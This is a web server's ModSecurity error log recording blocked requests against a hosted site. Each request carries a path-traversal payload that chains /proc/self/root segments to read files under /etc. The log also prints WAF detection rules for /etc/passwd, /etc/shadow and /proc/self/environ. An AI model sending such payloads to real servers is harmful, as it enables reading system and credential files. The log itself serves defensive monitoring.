[Tue Mar 17 08:50:34.748650 2026] [:error] [pid 11469:tid 140411565680384] [client 74.7.241.46:55756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablACpDEJR9VXonE_-1IowAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:35.960594 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.46:55762] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablACweiSKl8TjouI-b8hgAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:36.663553 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.243.203:56018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablADKBJNF7axNlVR0X30wAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:37.318361 2026] [:error] [pid 7000:tid 140411674785536] [client 74.7.241.46:55764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablADRePVOt35XCGZP8qXQAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:39.403259 2026] [:error] [pid 1961:tid 140411649607424] [client 74.7.241.46:41038] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablADnRXaaWotPICgYsfXgAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:42.930806 2026] [:error] [pid 11469:tid 140411632822016] [client 74.7.241.46:41052] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAEpDEJR9VXonE_-1IrQAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:49.809040 2026] [:error] [pid 7000:tid 140411574073088] [client 74.7.243.203:56030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAGRePVOt35XCGZP8qcQAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:50:52.435328 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.241.46:41056] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAHJDEJR9VXonE_-1IvAAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:55.939475 2026] [:error] [pid 7000:tid 140411607643904] [client 74.7.241.46:53516] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAHxePVOt35XCGZP8qhwAAA5A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:50:57.244532 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.241.46:53524] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAIZqmL8PQht4WJFlCPAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:51:37.739440 2026] [:error] [pid 7000:tid 140411641214720] [client 74.7.243.203:55604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablASRePVOt35XCGZP8q0gAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:51:44.742451 2026] [:error] [pid 7000:tid 140411599251200] [client 74.7.241.46:59342] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAUBePVOt35XCGZP8q2wAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:51:46.042482 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.241.46:43620] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAUu82sZHvlq4xgHq97QAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:51:48.425710 2026] [:error] [pid 1961:tid 140411607643904] [client 74.7.241.46:43632] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAVHRXaaWotPICgYsfhAAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:51:56.624811 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.46:60404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAXKBJNF7axNlVR0X38QAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:00.024865 2026] [:error] [pid 2305:tid 140411716749056] [client 74.7.243.203:51906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAYAQohV2v-7oj5HH15wAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:00.910732 2026] [:error] [pid 11469:tid 140411548894976] [client 74.7.243.203:50038] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAYJDEJR9VXonE_-1I7QAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:02.440081 2026] [:error] [pid 11469:tid 140411716749056] [client 74.7.243.203:50044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAYpDEJR9VXonE_-1I8QAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:03.783913 2026] [:error] [pid 2305:tid 140411666392832] [client 74.7.243.203:50050] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAYwQohV2v-7oj5HH16AAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:05.105983 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.243.203:50060] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAZe82sZHvlq4xgHq99QAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:06.478009 2026] [:error] [pid 2305:tid 140411708356352] [client 74.7.243.203:50076] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAZgQohV2v-7oj5HH16gAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:07.802985 2026] [:error] [pid 7000:tid 140411557287680] [client 74.7.243.203:50086] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAZxePVOt35XCGZP8q5AAAA5Y"], referer: 